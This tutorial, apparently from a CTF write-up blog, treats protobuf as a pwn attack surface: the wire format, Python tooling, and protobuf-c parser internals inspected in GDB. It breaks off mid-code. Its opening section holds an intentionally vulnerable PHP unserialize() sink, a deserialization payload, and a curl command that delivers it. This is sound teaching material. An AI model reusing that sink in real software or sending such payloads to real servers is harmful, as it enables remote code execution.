0 TL;DR

Modern PWN CTFs have drifted far from the comfortable pastures of classic BOFs, UAFs, or the House-of-whatever heap rituals. Today the arena is littered with MIPS firmware, custom VMs, compiler traps, rogue C2 servers, etc.

Among these, one pattern is showing up more often: protobuf-based attack surface.

1 SETUP

For pwning, we don't need a full gRPC microservice zoo. We just want three things:

  1. protoc – compile / encode / decode messages
  2. Python tooling – quick scripts to fuzz / craft payloads
  3. Optionally, a helper to peek into protobuf descriptors (e.g. pbtk)

1.1 Protobuf Compiler

Install protobuf compiler (protoc).

Ubuntu / Debian:

Bash
sudo apt update
sudo apt install -y protobuf-compiler libprotobuf-dev

Arch Linux:

Bash
sudo pacman -S protobuf

Verify:

Bash
protoc --version

1.2 Python Libraries

Payload scripting requires these modules:

Bash
python -m pip install \
    protobuf \
    grpcio \
    grpcio-tools \
    googleapis-common-protos

This gives us:

  • protoc bindings from Python
  • grpc_tools.protoc for generating stubs if needed
  • a comfortable environment for building / mutating protobuf payloads.

1.3 Protobuf Toolkit

Optionally, pbtk is handy for inspecting protobuf descriptors and browsing message structures. Installation steps:

Bash
# clone repo
git clone https://github.com/marin-m/pbtk
cd pbtk

# use standalone python venv
python -m venv .venv
source .venv/bin/activate
pip install protobuf pyqt5 pyqtwebengine requests websocket-client

The GUI can be launched through the main script gui.py:

pwn_protobuf_0

Use standalone scripts without GUI:

Bash
cd extractors

python from_binary.py [-h] input_file [output_dir]
python jar_extract.py [-h] input_file [output_dir]
python web_extract.py [-h] input_url [output_dir]

The repo is aging and relies on outdated dependencies, so it may not run reliably in restricted environments (but from_binary.py can be tweaked to search for the protobuf magic instead, which makes it work in more cases).

2 PROTOBUF

We skip Google's marketing definitions. This is protobuf viewed from the attacker's side.

2.1 JSON vs. Protobuf

2.1.1 JSON Serialization Format

When most developers think about data interchange, their instincts cling to text formats like JSON: readable, forgiving, and easy to misuse. PHP's native serialize() format belongs to the same family, and a classic PHP deserialization vulnerability looks like this:

PHP
<?php

// vuln.php

class VulnObject {
    public $cmd;

    public function __destruct() {
        system($this->cmd);
    }
}

// [!] Vulnerable: directly unserialize() attacker-controlled input
unserialize($_POST['data']);

That's the whole bug: attacker → unserialize() → arbitrary object → destructor → code execution.

Any backend that feeds attacker-controlled data into an unserialization sink exposes the classic PHP deserialization attack surface. A minimal, textbook payload generator looks like:

PHP
<?php

// exploit.php

class VulnObject { public $cmd; }

$e = new VulnObject();
$e->cmd = 'touch /tmp/pwned';

echo serialize($e) . PHP_EOL;

Running it produces something like:

Text
O:10:"VulnObject":1:{s:3:"cmd";s:16:"touch /tmp/pwned";}

And exploitation is simply:

Bash
curl -X POST http://target/vuln.php \
     --data-urlencode 'data=O:10:"VulnObject":1:{s:3:"cmd";s:16:"touch /tmp/pwned";}'

At that point, the server unserializes the attacker's crafted VulnObject. When the script ends, __destruct() fires and executes the command. This is the familiar deserialization playground most CTF players know.

But protobuf changes everything: no object strings, no visible fields — only binary tags, wire types, and length-delimited traps hiding the same level of power in a far more opaque form.

2.1.2 Binary Serialization Format

Protocol Buffers (protobuf), Google's compact binary serialization format, looks nothing like the readable PHP serialization example above. It is a far more discreet dialect that hides beneath ordinary traffic.

A protobuf blob looks like noise:

pwn_protobuf_1

The output is a binary maze—tags, wire types, and length fields stitched together with strict structure and even stricter expectations.

Unlike JSON, protobuf carries:

  • no field names
  • no delimiters
  • no visible structure

Just bytes.

Disassembling our tiny demo protobuf message (from User { id: 1337, name: "Axura" }) at the byte level:

08               → field 1 (id), wire type 0 (varint)
b9 0a            → varint 1337
12               → field 2 (name), wire type 2 (length-delimited)
05               → length = 5
41 78 75 72 61   → "Axura"

This is minimal but enlightening. Every piece of meaning (identity, boundaries, type) is encoded as numeric tags + wire types, forming a schema-bound contract enforced by .proto definitions.

2.2 Protobuf 101

For full documentation, see the official reference: https://protobuf.dev/

2.2.1 Message Definition

Every protobuf message type is defined in a .proto file — this is the authoritative description of the message's structure:

  • field names → used in source code
  • field types → determine how values are encoded
  • field numbers (tags) → define the binary identity of each field
  • features / editions → control optional language behaviors

Example:

proto
message User {
    int32  id     = 1;
    string name   = 2;
    bytes  avatar = 3;
}

Each field has two identities in this message:

2.2.1.1 Field name

id, name, avatar

  • Used only in source code (User().name, User().avatar, etc.).
  • After compilation, the name string resides in .rodata section.

2.2.1.2 Field number (tag)

1, 2, 3

  • Used only in the binary wire format.
  • Determines how the field is encoded and decoded.
  • Must never change once deployed.
  • Defines the real "shape" of the message on the wire.

This distinction is vital in pwn challenges:

When decoding, protobuf parsers look only at field numbers and wire types; field names do not exist in the binary stream. Field names help humans, while field numbers define reality.

2.2.1.3 Editions

In modern protobuf, an edition defines the language-level features available to the .proto file — things like UTF-8 validation, optional semantics, repeated field encoding rules, and other behaviors that used to be tied to the traditional proto2 / proto3.

We can declare the edition directly:

proto
edition = "2024";
// syntax = "proto2";
// syntax = "proto3";

message User {
    int32 id = 1;
    string name = 2;
}

Official docs:

Here we should remember:

  • Editions modify only language-level features, NOT the wire format —a crucial property when reversing or exploiting protobuf-based binaries.
  • Newer editions may add or enforce safety checks (e.g., UTF-8 validation).
  • Editions define the default semantics, but individual fields may override features if needed.
  • A decoder does not know whether the sender used proto2 or proto3.

Although modern protobuf introduces "Editions" and the traditional syntax = "proto2" / "proto3" distinction, these differences do not affect the wire format—the decoder only cares about field numbers and wire types, not the .proto syntax used to generate them.

2.2.3 Wire Format

2.2.3.1 Wire types

Protobuf defines six wire types:

Wire Type   Meaning               Typical Fields
0           Varint                int32, int64, bool
1           64-bit                fixed64, double
2           Length-delimited      string, bytes, embedded messages
3 / 4       Groups (deprecated)   legacy structured fields
5           32-bit                fixed32, float

We will use our example message definition for illustration:

proto
syntax = "proto3";
    
message User {
    int32  id     = 1;  // varint
    string name   = 2;  // length-delimited
    bytes  avatar = 3;  // length-delimited
}

The generated protobuf message (from User { id: 1337, name: "Axura" }):

00000000: 08 b9 0a 12 05 41 78 75 72 61    .....Axura

When a protobuf message is encoded, everything ultimately becomes a flat sequence of:

[field_key] [field_value]

Where field_key is a single varint computed as:

field_key = (field_number << 3) | wire_type

Our message thus can be illustrated as:

pwn_protobuf_3
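The key formula above can be sketched in a few lines of Python. The helper names make_key and split_key are made up for this illustration and are not part of any protobuf library:

```python
def make_key(field_number: int, wire_type: int) -> int:
    """Pack a field number and wire type into a field_key."""
    return (field_number << 3) | wire_type


def split_key(key: int) -> tuple[int, int]:
    """Recover (field_number, wire_type) from a field_key."""
    return key >> 3, key & 0x7


# The three keys that appear in the User examples of this article
for key in (0x08, 0x12, 0x1A):
    print(hex(key), split_key(key))
# 0x8 (1, 0)
# 0x12 (2, 2)
# 0x1a (3, 2)
```

Because the key is itself a varint, field numbers of 16 and above no longer fit in a single byte on the wire.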

2.2.3.2 Varint

Varint (variable-length integer) encodes integers in 7-bit chunks, little-endian, with the MSB as a "more bytes follow" flag:

  • lower 7 bits in each byte = data
  • MSB (bit 7):
    • 1 → there is another byte
    • 0 → this is the last byte

In Python terms, given an unsigned integer n:

Python
def encode_varint(n: int) -> bytes:
    """Encode an unsigned integer as a protobuf varint."""
    # 0x80 == 0b10000000 (continuation flag)
    # 0x7f == 0b01111111 (7-bit data mask)
    out = bytearray()
    while n >= 0x80:
        # take lowest 7 bits + mark 'more bytes follow'
        out.append((n & 0x7F) | 0x80)
        n >>= 7  # shift right by 7 bits
    # last chunk: just the remaining 7 bits, MSB = 0
    out.append(n)
    return bytes(out)

In our example (field 1: id = 1337), the 1st part, the field_key, is encoded as:

  • type = int32 → wire type 0 (varint)
  • field_number = 1 (< 0x80)
  • It's a field_key. So apply field_key = (field_number << 3) | wire_type
    • field_key = (1 << 3) | 0 = 8 = 0x08

So the field_key, emitted as a single-byte varint, is:

[ 0x08 ]

On the other hand, the field_value for this field_key is an int32, which is also encoded as a varint:

  • type = int32 → wire type 0 (varint)
  • field_value = 1337 (>= 0x80)
  • First byte:
    • Take lowest 7 bits: n & 0x7f = 1337 & 127 = 57 (0x39)
    • Mark "more bytes follow" by setting MSB = 1: 0x39 | 0x80 = 0xB9
  • Second byte:
    • Shift right by 7 bits (drop already processed bits): n >>= 7 → 1337 >> 7 = floor(1337 / 128) = 10
    • Now n = 10 (< 0x80), so 2nd (last) byte is just 0x0A

So the varint(1337) bytes as the field_value are:

[ 0xB9, 0x0A ]

And eventually, the whole wire bytes for id field is:

08 b9 0a
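Going the other way is just as mechanical. The following is a minimal sketch of a varint decoder; decode_varint is a name chosen for this example, and the function does no bounds or overlong-encoding checks beyond what Python itself raises:

```python
def decode_varint(buf: bytes, pos: int = 0) -> tuple[int, int]:
    """Decode one varint starting at buf[pos]; return (value, next_pos)."""
    value = 0
    shift = 0
    while True:
        byte = buf[pos]                   # IndexError if the input is truncated
        pos += 1
        value |= (byte & 0x7F) << shift   # 7 data bits, least significant group first
        if byte & 0x80 == 0:              # MSB clear: this was the last byte
            return value, pos
        shift += 7


value, next_pos = decode_varint(bytes([0xB9, 0x0A]))
print(value, next_pos)  # 1337 2
```

Returning the next position alongside the value makes it easy to keep walking the buffer field by field.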

2.2.3.3 Wire type 2

For pwn engineers, wire type 2 (length-delimited) is the most dangerous:

The length itself is a varint, and parsers must trust it.

This wire type is used for:

  • strings
  • bytes
  • repeated packed fields
  • embedded messages

Its structure:

[<tag>|2] [length: varint] [raw bytes]

For a parser:

  1. Read "length"
  2. Allocate memory / copy bytes
  3. Recursively decode if it's another message

In our simple example (field 2: name = "Axura"), the 1st part (field_key) can be encoded as:

  • type = string → wire type 2 (length-delimited)
  • field_number (tag) = 2
  • field_key = (2 << 3) | 2 = 18 = 0x12

The 2nd part holds the 5-byte string "Axura", then:

  • length = 05 (< 0x80)
    • varint(5) = 0x5, MSB = 0
  • data = 41 78 75 72 61

So the full bytes for the name field's payload are:

05 41 78 75 72 61

Put together with the tag (0x12 for field 2, wire type 2), we get:

12 05 41 78 75 72 61
^^ ^^ ^^^^^^^^^^^^^^
│  │        └── value bytes ("Axura")
│  └── length = 5 (varint)
└──── field_key = tag 2, wire type 2
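The layout above can be reproduced by hand. This is a small sketch, not library code: encode_varint and length_delimited are helper names invented here, and the 300-byte payload is only there to show a length that needs two varint bytes.

```python
def encode_varint(n: int) -> bytes:
    """Encode an unsigned integer as a protobuf varint."""
    out = bytearray()
    while n >= 0x80:
        out.append((n & 0x7F) | 0x80)
        n >>= 7
    out.append(n)
    return bytes(out)


def length_delimited(field_number: int, payload: bytes) -> bytes:
    """Build [key] [length varint] [raw bytes] for a wire type 2 field."""
    key = (field_number << 3) | 2
    return encode_varint(key) + encode_varint(len(payload)) + payload


name = length_delimited(2, b"Axura")
print(name.hex(" "))      # 12 05 41 78 75 72 61

big = length_delimited(3, b"A" * 300)
print(big[:3].hex(" "))   # 1a ac 02
```

Building fields this way, instead of through the generated bindings, is also how one would emit a length that deliberately disagrees with the payload when probing a custom parser.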

2.2.4 Embedded Messages

So far we've only looked at flat fields. Protobuf gets more interesting (and more dangerous) when messages start containing other messages.

Let's extend our previous example:

proto
message User {
    int32  id     = 1;
    string name   = 2;
    bytes  avatar = 3;
}

message Profile {
    User   user   = 1;  // embedded message
    string status = 2;
}

On the wire, embedded messages are still just length-delimited fields (wire type 2):

[tag(user)|2]   [len_user]   [  ... bytes of encoded User ...  ]
[tag(status)|2] [len_status] [ status bytes ]

If we reuse the earlier User instance:

proto
User {
  id   = 1337;
  name = "Axura";
}

we already know its bytes:

08 b9 0a 12 05 41 78 75 72 61

When it's embedded as Profile.user, the encoder wraps that in a length-delimited field:

  • field_number = 1
  • wire type = 2 (length-delimited)
  • field_key = (1 << 3) | 2 = 0x0a

So the user field in Profile becomes:

0a 0a 08 b9 0a 12 05 41 78 75 72 61
^^ ^^
│  └─ length = 0x0a (10 bytes of embedded User)
└──── tag=1, wire_type=2

Then status is just another length-delimited field after that.
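To see the nesting from the decoder's side, here is a schema-less field walker as a rough sketch. It only handles wire types 0 and 2, the function names are invented for this example, and the status value "ok" is an assumed sample that does not come from the original message.

```python
def read_varint(buf: bytes, pos: int) -> tuple[int, int]:
    """Decode one varint at buf[pos]; return (value, next_pos)."""
    value, shift = 0, 0
    while True:
        byte = buf[pos]
        pos += 1
        value |= (byte & 0x7F) << shift
        if byte & 0x80 == 0:
            return value, pos
        shift += 7


def walk_fields(buf: bytes) -> list:
    """Split a message into (field_number, wire_type, raw_value) tuples."""
    fields, pos = [], 0
    while pos < len(buf):
        key, pos = read_varint(buf, pos)
        number, wire_type = key >> 3, key & 0x7
        if wire_type == 0:                       # varint
            value, pos = read_varint(buf, pos)
        elif wire_type == 2:                     # length-delimited
            length, pos = read_varint(buf, pos)
            if pos + length > len(buf):
                raise ValueError("declared length runs past the buffer")
            value = buf[pos:pos + length]
            pos += length
        else:
            raise ValueError(f"wire type {wire_type} not handled in this sketch")
        fields.append((number, wire_type, value))
    return fields


# Profile { user = <User bytes>, status = "ok" }  ("ok" is an assumed sample)
profile = bytes.fromhex("0a0a08b90a12054178757261" "12026f6b")
outer = walk_fields(profile)
print(outer[1])                  # (2, 2, b'ok')
print(walk_fields(outer[0][2]))  # [(1, 0, 1337), (2, 2, b'Axura')]
```

Note that nothing on the wire says field 1 is a message rather than a string; the walker only recurses because we chose to treat it that way.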

2.3 Python Handler

Hand-crafting varints is fun once. After that, we want tooling.

We'll assume this message definition:

proto
// user.proto
syntax = "proto3";

message User {
    int32  id     = 1;
    string name   = 2;
    bytes  avatar = 3;
}

2.3.1 Python Bindings

First, make sure we have the protobuf Python package installed:

Bash
pip install protobuf

Then use protoc to generate Python bindings:

Bash
protoc --python_out=. user.proto

This produces ./user_pb2.py:

Python
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler.  DO NOT EDIT!
# NO CHECKED-IN PROTOBUF GENCODE
# source: user.proto
# Protobuf Python Version: 5.29.2
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import descriptor_pool as _descriptor_pool
from google.protobuf import runtime_version as _runtime_version
from google.protobuf import symbol_database as _symbol_database
from google.protobuf.internal import builder as _builder
_runtime_version.ValidateProtobufRuntimeVersion(
    _runtime_version.Domain.PUBLIC,
    5,
    29,
    2,
    '',
    'user.proto'
)
# @@protoc_insertion_point(imports)

_sym_db = _symbol_database.Default()

DESCRIPTOR = _descriptor_pool.Default().AddSerializedFile(b'\n\nuser.proto\"0\n\x04User\x12\n\n\x02id\x18\x01 \x01(\x05\x12\x0c\n\x04name\x18\x02 \x01(\t\x12\x0e\n\x06\x61vatar\x18\x03 \x01(\x0c\x62\x06proto3')

_globals = globals()
_builder.BuildMessageAndEnumDescriptors(DESCRIPTOR, _globals)
_builder.BuildTopDescriptorsAndMessages(DESCRIPTOR, 'user_pb2', _globals)
if not _descriptor._USE_C_DESCRIPTORS:
  DESCRIPTOR._loaded_options = None
  _globals['_USER']._serialized_start=14
  _globals['_USER']._serialized_end=62
# @@protoc_insertion_point(module_scope)

We don't need to care about the internals for pwn. What matters is:

  • It defines a Python class User that matches our .proto.
  • That class knows how to encode and decode protobuf wire format.

2.3.2 Template Scripts

Once user_pb2.py is generated, we can import User in the pwn script and let the protobuf library handle all the varints / field keys for us.

Python
# exploit.py
from user_pb2 import User

def build_user(id_val, name_val, avatar_bytes=b""):
    u = User()              # create a new message instance
    u.id = id_val           # assign scalar field
    u.name = name_val       # assign string field
    if avatar_bytes:
        u.avatar = avatar_bytes		# assign bytes field
    return u.SerializeToString()	# → raw protobuf bytes

if __name__ == "__main__":
    pb = build_user(1337, "Axura", b"\x01\x02\xff")
    
    # in real exploit: send blob to remote 
    print(pb.hex())			# 08b90a120541787572611a030102ff

Decoding captured traffic or server responses works symmetrically:

Python
from user_pb2 import User

def parse_user(data: bytes) -> User:
    u = User()
    u.ParseFromString(data)   # parse raw protobuf → fill fields
    return u

# sample:
# u = parse_user(captured_bytes)
# print(u.id, u.name, u.avatar)

Now instead of manually guessing varints, we:

  • define the structure once in .proto,
  • let protoc generate the bindings,
  • and focus on abusing how the target uses the decoded fields (sizes, indexes, pointers, etc.).

2.3.3 Python APIs

After importing User, the protobuf runtime deals with varints and field keys for us:

Python
from user_pb2 import User

With that in place, we can explore more of the message API for building and manipulating protobuf buffers.

2.3.3.1 Encoding messages

Python
u = User()          		# new empty message
u.id = 1337         		# scalar
u.name = "Axura"    		# string
u.avatar = b"\x01\x02\xff"  # bytes

pb = u.SerializeToString()	# → raw protobuf bytes

SerializeToString() is the method we'll call before send() in our pwn script.

There's also:

Python
u.ByteSize()        # how many bytes the serialized message would use

Useful if the service expects a length-prefixed protobuf (e.g. [4-byte length][protobuf bytes]).
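As a hedged sketch of that framing: the 4-byte little-endian prefix below is an assumption for illustration, since each challenge defines its own header (big-endian, 2-byte, or varint prefixes are all common). The frame and unframe helpers are hypothetical names.

```python
import struct


def frame(payload: bytes) -> bytes:
    """Prefix a serialized message with an assumed 4-byte little-endian length."""
    return struct.pack("<I", len(payload)) + payload


def unframe(stream: bytes) -> tuple[bytes, bytes]:
    """Split one framed message off the front; return (payload, rest)."""
    (length,) = struct.unpack_from("<I", stream, 0)
    payload = stream[4:4 + length]
    if len(payload) != length:
        raise ValueError("stream is shorter than the declared length")
    return payload, stream[4 + length:]


# Serialized User { id: 1337, name: "Axura", avatar: 01 02 ff }
pb = bytes.fromhex("08b90a120541787572611a030102ff")
wire = frame(pb)
print(wire[:4].hex())          # 0f000000
print(unframe(wire)[0] == pb)  # True
```

With the generated bindings, len(u.SerializeToString()) gives the same number as u.ByteSize(), so either can feed the prefix.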

2.3.3.2 Decoding messages

Python
u = User()
u.ParseFromString(data)   # in-place parse

There is also a class-level helper in newer versions:

Python
u = User.FromString(data)   # same effect as ParseFromString into a new object

2.3.3.3 Inspecting fields

List all populated fields:

Python
u = User.FromString(data)
for desc, value in u.ListFields():
    print(desc.name, value)

Clear a field explicitly:

Python
u.ClearField("avatar")

Reset whole message:

Python
u.Clear()

2.3.3.4 Repeated fields

If the challenge uses repeated fields (arrays / lists), we get a list-like object:

Python
"""
message Packet {
    repeated uint32 ids = 1;
}
"""
from packet_pb2 import Packet

p = Packet()
p.ids.append(1)
p.ids.extend([2, 3, 4])

print(p.ids)         # [1, 2, 3, 4]
p.ids[0] = 1337      # index assignment
del p.ids[1]         # delete element

Typical pwn use: heap spraying through many repeated elements, or abusing the server's logic that loops over len(ids).

2.3.3.5 Oneof

If the CTF challenge uses oneof (e.g. message "choice" / command cases), protobuf gives us a small helper:

proto
syntax = "proto3";

message Msg {
  oneof op {
    uint32 create = 1;
    uint32 edit   = 2;
    uint32 show   = 3;
  }
}

Python side:

Python
from msg_pb2 import Msg

m = Msg()

# which field in this oneof is currently set?
m.create = 1
print(m.WhichOneof("op"))  # "create"
m.edit = 9
print(m.WhichOneof("op"))  # "edit"

WhichOneof() is handy when parsing unknown blobs and trying to see which action the server thinks it's handling.

2.3.3.6 Copying / merging messages

When we want to tweak only parts of a base template:

Python
base = User(id=1, name="base")
mut = User()
mut.CopyFrom(base)          # deep copy
mut.id = 1337               # modify one field

or merge partial messages:

Python
a = User(id=1)
b = User(name="Axura")
a.MergeFrom(b)              # a now has id=1, name="Axura"

In fuzzing, this lets us keep a "known-good" skeleton and mutate only the fields we care about.

2.4 Low-Level Protobuf

So far we've treated protobuf as a clean Python API. On the C side, things are much more interesting for pwn: messages are just structs in memory with predictable layouts.

2.4.1 Debug Protobuf

Wire type 2 is critical in protobuf-based pwn. It represents length-delimited fields: a varint length, followed by raw bytes. It is used for both string and bytes, yet the two are parsed differently, because the wire type alone does not identify the field's declared type; the parser resolves that from the message descriptor.

2.4.1.1 Setup Demo

We use the same example user.proto schema:

proto
syntax = "proto3";

message User {
    int32  id     = 1;
    string name   = 2;
    bytes  avatar = 3;
}

Compile for Python:

Bash
# generate user_pb2.py
protoc --python_out=. user.proto

The payload builder build_user.py consumes the created user_pb2.py as a dependency, outputs protocol buffer binary user.bin:

Python
from user_pb2 import User

def build_user(id_val, name_val, avatar_bytes=b""):
    u = User()
    u.id = id_val
    u.name = name_val
    if avatar_bytes:
        u.avatar = avatar_bytes
    return u.SerializeToString()

if __name__ == "__main__":
    blob = build_user(1337, "Axura", b"\x01\x02\xff")
    # write to file so C side can read it
    with open("user.bin", "wb") as f:
        f.write(blob)

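Now prepare the C-side parser. This needs the protobuf-c code generator and runtime library installed. Compile the same schema through protoc's --c_out option (protoc-c is the old-school alias for the same generator):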

Bash
# generate user.pb-c.h, user.pb-c.c
protoc --c_out=. user.proto

The C parser parse_user.c will read user.bin, deserialize it using the generated bindings, and pause for inspection:

C
// parse_user.c
#include "user.pb-c.h"
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

int main(void) {
    FILE *f = fopen("user.bin", "rb");
    if (!f) {
        perror("fopen user.bin");
        return 1;
    }

    // get file size
    if (fseek(f, 0, SEEK_END) != 0) {
        perror("fseek");
        fclose(f);
        return 1;
    }
    long flen = ftell(f);
    if (flen < 0) {
        perror("ftell");
        fclose(f);
        return 1;
    }
    rewind(f);

    // read protobuf file into buf
    size_t len = (size_t)flen;
    unsigned char *buf = malloc(len);
    if (!buf) {
        perror("malloc");
        fclose(f);
        return 1;
    }

    if (fread(buf, 1, len, f) != len) {
        perror("fread");
        free(buf);
        fclose(f);
        return 1;
    }
    fclose(f);

    // unpack using protobuf-c
    User *u = user__unpack(NULL, len, buf);
    if (!u) {
        fprintf(stderr, "unpack failed\n");
        free(buf);
        return 1;
    }

    printf("len(user.bin) = %zu\n", len);
    printf("id            = %d\n", u->id);
    printf("name          = %s\n", u->name);
    printf("avatar.len    = %zu\n", u->avatar.len);

    puts("ready for gdb; press Enter to free");
    getchar(); 

    user__free_unpacked(u, NULL);
    free(buf);
    return 0;
}

Build:

Bash
# build parse_user binary
gcc -g parse_user.c user.pb-c.c -lprotobuf-c -o parse_user                                         

Dump the serialized protobuf payload from the generated user.bin:

$ xxd -g1 user.bin
00000000: 08 b9 0a 12 05 41 78 75 72 61 1a 03 01 02 ff     .....Axura.....

Dissection:

08 b9 0a 12 05 41 78 75 72 61 1a 03 01 02 ff
         ^^ ^^ ^^^^^^^^^^^^^^ ^^ ^^ ^^^^^^^^
         │  │       │         │  │   └─ avatar bytes
         │  │       │         │  └─ length=3
         │  │       │         └─ tag=3 (avatar)
         │  │       └─ "Axura"
         │  └─ length=5
         └─ tag=2 (name)

At the wire level, string name and bytes avatar are both wire-type-2 layout:

[tag|2] [length varint] [length bytes of data]

But internally, the parser handles them differently. The parser consults the schema descriptors and maps each tag to a type.

2.4.1.2 Debugging

Use GDB to inspect protobuf internals at runtime:

Bash
# start gdb to debug
gdb ./parse_user

# inside gdb, set breakpoints:
gdb> b 49	# after message created && before free'd
gdb> b user__unpack
gdb> b user__free_unpacked
gdb> r < user.bin

At user__unpack (calling protobuf_c_message_unpack), the parser starts decoding the wire format:

pwn_protobuf_5

The serialized message buf matches user.bin (of course):

  • 08 → field 1, wire type 0 (id)
  • b9 0a → varint(1337)
  • 12 → field 2, wire type 2 (name)
  • 05 → length = 5, the string length
  • 41 78 75 72 61 → "Axura"
  • 1a → field 3, wire type 2 (avatar)
  • 03 → length = 3
  • 01 02 ff → avatar bytes

Resume until breakpoint after unpacking. The struct instance (User u) is initialized in memory:

pwn_protobuf_4

String length specifier 0x5 is consumed, while the length specifier 0x3 for bytes data remains. From the wire perspective, both field 2 and field 3 are just:

[tag=2, wt=2] [len=5] [5 bytes]
[tag=3, wt=2] [len=3] [3 bytes]

Although nothing in the bytes says:

  • "field 2 is string, must be UTF-8"
  • "field 3 is raw bytes"

—at the end, they are parsed differently. Because the schema (user.proto) declares:

proto
message User {
    int32  id     = 1;
    string name   = 2;  // <-- STRING
    bytes  avatar = 3;  // <-- BYTES
}

protoc turns that into C code + a descriptor in user.pb-c.c (or user_pb2.py when imported by Python):

  • a User struct
  • a user__descriptor object
  • an array of field descriptors

To inspect those internal descriptors, we can stop at the last breakpoint user__free_unpacked (calling protobuf_c_message_free_unpacked):

gdb> set $u = (User *)$rdi
pwn_protobuf_6

Next, we will take a deeper dive into all those mentioned C structures.

2.4.2 Protobuf Internals

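The message-specific structures in this demo (the User struct and its descriptors) are generated by protoc into user.pb-c.h and user.pb-c.c. The generic types they build on (ProtobufCMessage, ProtobufCMessageDescriptor, ProtobufCFieldDescriptor, ProtobufCBinaryData) come from the protobuf-c runtime header protobuf-c.h.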

2.4.2.1 Base Header

Every generated C struct starts with a common header:

C
struct ProtobufCMessage {
    const ProtobufCMessageDescriptor *descriptor;  // 8 bytes (ptr)
    unsigned n_unknown_fields;                     // 4 bytes + 4 bytes padding
    ProtobufCUnknownField *unknown_fields;         // 8 bytes (ptr)
};  // → 24 bytes total on x86-64

This "base" is embedded as the first field of every message. We can view the message structure in user.pb-c.h:

C
struct  User
{
    ProtobufCMessage base;
    int32_t id;
    char *name;
    ProtobufCBinaryData avatar;
};

Inspect our demo in GDB:

pwn_protobuf_7

After parsing, the User struct is heap-allocated. Its first 0x18 bytes contain the ProtobufCMessage base — a header that always precedes the parsed message content.
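The layout can be double-checked without a debugger by mirroring the structs in Python's ctypes. This is a sketch assuming a 64-bit target; pointers are modelled as plain c_void_p, and the classes are hand-written mirrors of the C definitions rather than anything generated.

```python
import ctypes


class ProtobufCMessage(ctypes.Structure):
    _fields_ = [
        ("descriptor", ctypes.c_void_p),
        ("n_unknown_fields", ctypes.c_uint),   # 4 bytes, then 4 bytes of padding
        ("unknown_fields", ctypes.c_void_p),
    ]


class ProtobufCBinaryData(ctypes.Structure):
    _fields_ = [
        ("len", ctypes.c_size_t),
        ("data", ctypes.c_void_p),
    ]


class User(ctypes.Structure):
    _fields_ = [
        ("base", ProtobufCMessage),
        ("id", ctypes.c_int32),
        ("name", ctypes.c_void_p),             # char * in the C struct
        ("avatar", ProtobufCBinaryData),
    ]


print(hex(ctypes.sizeof(ProtobufCMessage)))    # 0x18 on a 64-bit build
print(hex(ctypes.sizeof(User)))                # 0x38 on a 64-bit build
for field_name, _ in User._fields_:
    print(field_name, hex(getattr(User, field_name).offset))
```

On a 64-bit build the offsets come out as base 0x0, id 0x18, name 0x20 and avatar 0x28, which is a handy cheat sheet when a decompiler shows raw pointer arithmetic on a message.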

2.4.2.2 Descriptors

The base header (ProtobufCMessage) points to a ProtobufCMessageDescriptor. It describes how the message should be parsed by the protobuf engine.

pwn_protobuf_8

In our runtime demo, the User instance has an actual sizeof_message of 56 (0x38):

pwn_protobuf_9

When the parser calls:

C
User *u = user__unpack(NULL, len, buf);

that becomes:

C
protobuf_c_message_unpack(&user__descriptor, allocator, len, buf);
pwn_protobuf_10

The ProtobufCMessageDescriptor we just printed drives everything.

First, it verifies that the descriptor is a valid message descriptor (so we cannot simply substitute a self-made one during an attack):

C
assert(descriptor->magic == PROTOBUF_C__MESSAGE_DESCRIPTOR_MAGIC);

That magic field is 682290937 (0x28AAEEF9), a sanity check.

gdb> p (*($u->base.descriptor)).magic
$2 = 682290937

Then it allocates and initializes the C struct according to the sizeof_message and message_init members inside that message descriptor (ProtobufCMessageDescriptor):

C
// sizeof_message = 56 (0x38) → sizeof(User)
msg = allocator->alloc(allocator, descriptor->sizeof_message);
memset(msg, 0, descriptor->sizeof_message);

// call message_init (here: user__init)
descriptor->message_init(msg);

That message_init pointer is user__init defined in user.pb-c.c:

C
void user__init(User *message) {
    static const User init_value = USER__INIT;
    *message = init_value;
}

which applies USER__INIT from user.pb-c.h:

C
#define USER__INIT \
 { PROTOBUF_C_MESSAGE_INIT (&user__descriptor) \
, 0, (char *)protobuf_c_empty_string, {0,NULL} }

So a freshly-initialized User in memory starts as:

  • base.descriptor = &user__descriptor
  • base.n_unknown_fields = 0, base.unknown_fields = NULL
  • id = 0
  • name = "" (actually protobuf_c_empty_string in .rodata)
  • avatar = { .len = 0, .data = NULL }

That base (base) is the schema bridge: base.descriptor points to the ProtobufCMessageDescriptor, which defines how this struct is parsed and serialized.

From user.pb-c.c we see:

C
const ProtobufCMessageDescriptor user__descriptor = {
    PROTOBUF_C__MESSAGE_DESCRIPTOR_MAGIC,
    "User",
    "User",
    "User",
    "",
    sizeof(User),               // 56 bytes for User
    3,                          // number of fields
    user__field_descriptors,    // ← field table
    user__field_indices_by_name,
    1, user__number_ranges,
    (ProtobufCMessageInit) user__init,
    NULL, NULL, NULL
};

The critical part for us is user__field_descriptors: a C array of ProtobufCFieldDescriptor entries that map wire-level field numbers to concrete C layout:

pwn_protobuf_11

Inspect those fields in our runtime demo:

gdb> set $d = $u->base.descriptor
gdb> set $f = $d->fields
gdb> p $f[0]
gdb> p $f[1]
gdb> p $f[2]
pwn_protobuf_12

So at decode time, the generic engine sees the wire:

field_number = N
wire_type    = 0 / 1 / 2 / 5 / ...

It looks up the field descriptor (one of those $f[i]) using:

  • fd->type → what this field is (INT32 / STRING / BYTES / MESSAGE / ENUM)
  • fd->offset → where in the struct to store it ((uint8_t *)msg + offset)
  • fd->descriptor → sub-message / enum descriptor if type is MESSAGE / ENUM
  • fd->default_value → default for unset fields (like protobuf_c_empty_string)

Then decodes and stores accordingly:

  • PROTOBUF_C_TYPE_INT32 → read varint, write int32_t at msg + offset
  • PROTOBUF_C_TYPE_STRING → read length, malloc(len+1), NUL-terminate, store char * at msg + offset
  • PROTOBUF_C_TYPE_BYTES → read length, malloc(len), store into ((ProtobufCBinaryData *)(msg+offset))->len/data
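The descriptor-driven dispatch can be imitated in Python to make the idea concrete. This is a loose model, not protobuf-c's actual code: the FIELDS table stands in for the field descriptor array, a dict stands in for the C struct, unknown field numbers are simply skipped, and a wire type that disagrees with the table is rejected (a choice made for this sketch only).

```python
# field number -> (name, declared type); stands in for user__field_descriptors
FIELDS = {1: ("id", "INT32"), 2: ("name", "STRING"), 3: ("avatar", "BYTES")}
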